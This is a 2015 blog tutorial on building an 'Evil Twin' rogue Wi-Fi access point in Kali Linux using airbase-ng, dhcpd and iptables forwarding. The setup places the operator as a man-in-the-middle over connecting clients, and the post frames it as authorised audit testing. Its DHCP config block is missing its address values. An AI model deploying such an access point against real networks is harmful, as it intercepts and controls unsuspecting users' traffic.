August 22, 2015

When conducting a security audit, you should also make sure to test any wireless networks that may be setup. As these networks do not always require direct, physical access within the building housing the wireless access points, they can be exploited by someone in their car or even a pesky neighbor. In this tutorial, we will be utilizing Kali Linux in order to create an Evil Twin wireless access point, which can be useful in both testing the current wireless setup along with testing the human element of security.

An Evil Twin AP is a wireless AP that appears to be legitimate, sometimes even using the same SSID as another AP in the area, but allows an attacker to both view and control the data sent to/from any clients connected to it. Once connected to it, users typically would not suspect anything as they are able to successfully access any network assets and/or the Internet. Unfortunately for them, you are the Man-in-the-Middle and have visibility and control over their data packets.

Please note: The following tutorial is being tested against my own access point, and these steps should ONLY be performed against your own access point, or one you have been authorized to test against.

I. Equipment Needed
You will need a fairly decent wireless adapter in order to successfully perform this attack during an audit. I am currently using the Alfa AWUS036NH USB wireless adapter. This is perfect for using with Kali Linux, as it comes with the proper drives thus allowing you to get started quicker. You will also, naturally, need to be running Kali Linux.

II. Getting Started
Before we get started, you should go ahead and connect to a network that has Internet connectivity. You can do this via Ethernet or via WiFi. For this example, I will be connecting to a separate SSID of mine via my internal wireless card (wlan0). If you choose to use Ethernet, then in some of the example commands you will need to replace "wlan0" with "eth0."

Unless you already know the target SSID that you will be mimicking and the corresponding channel that it is operating on, you will need to run a quick wireless scan and determine that information. This can be quickly accomplished via the following command:

iwlist wlan1 scanning

After documenting both the SSID and channel of the target, let's enable our Alfa card to run in Monitor mode:

airmon-ng start wlan1

III. Configuring the Evil Twin
With the SSID and broadcasting channel of our target, we can begin by creating our own access point that will utilize this same information. This is done via the following command:

airbase-ng -e [Target's SSID] -c [Target's Channel] mon0

In this example, we are mimicking the SSID "SkyNet," which I have setup for testing.

Now you will need to configure the IP address and subnet mask for your access point. If you happen to know the IP scheme of your target, possibly by authenticating to it previously, then you should use its IP scheme.

ifconfig at0 up
ifconfig at0 [IP Address for Our AP] netmask [Subnet Mask for AP]

Next, we need to configure DHCP to run on our Evil Twin. Again, you should use the IP scheme of your target if you know that information already. Before enabling DHCP, we need to create a config file that we will be using. The following is the config file that is being used for this example:

     # Google's DNS servers
     option domain-name-servers,;
     default-lease-time 600;
     option T150 code 150 = string;
     deny client-updates;
     one-lease-per-client false;
     allow bootp;
     ddns-updates off;
     ddns-update-style none;
     # DHCP Scope & Configuration for our AP
     subnet netmask {
     interface at0;
     option routers;
     option subnet-mask;
     option broadcast-address;
     option domain-name-servers;
     allow unknown-clients;

Using this configuration file, we can now we can enable DHCP on our AP:

dhcpd -d -f -cf /etc/dhcp/RogueAP_DHCPD.conf at0 &

IV. Configuring IP Forwarding
While we now have an access point that clients can connect to and obtain a proper DHCP address from, they still cannot connect to any network/Internet resources. In order to allow this, we will need to configure IP forwarding. This will allow anyone connecting to the fake SSID to have their connection routed through our other network adapter (wlan0).

We first need to add a static route and configure our access point's IP address as the local gateway.

route add -net [Network of our AP] netmask [Subnet mask of our AP] gw [AP's IP address]

Next, we can configure IP tables to accept routing using the following commands:

iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

Finally, we activate IP Forwarding in the kernel by changing the value within the corresponding configuration file.

echo "1" > /proc/sys/net/ipv4/ip_forward

If you have followed all of these steps correctly, you should now have a functional Evil Twin access point that is mimicking the appearance of the targeted AP. Anyone connecting to what they believe is a legitimate access point will now have their data packets routed through your PC to the corporate network and/or Internet.

Tune in for part two where we go over some possibilities now that you have gained control over the clients' connectivity. To be continued...


Post a Comment

Subscribe to RSS Feed Follow me on Twitter!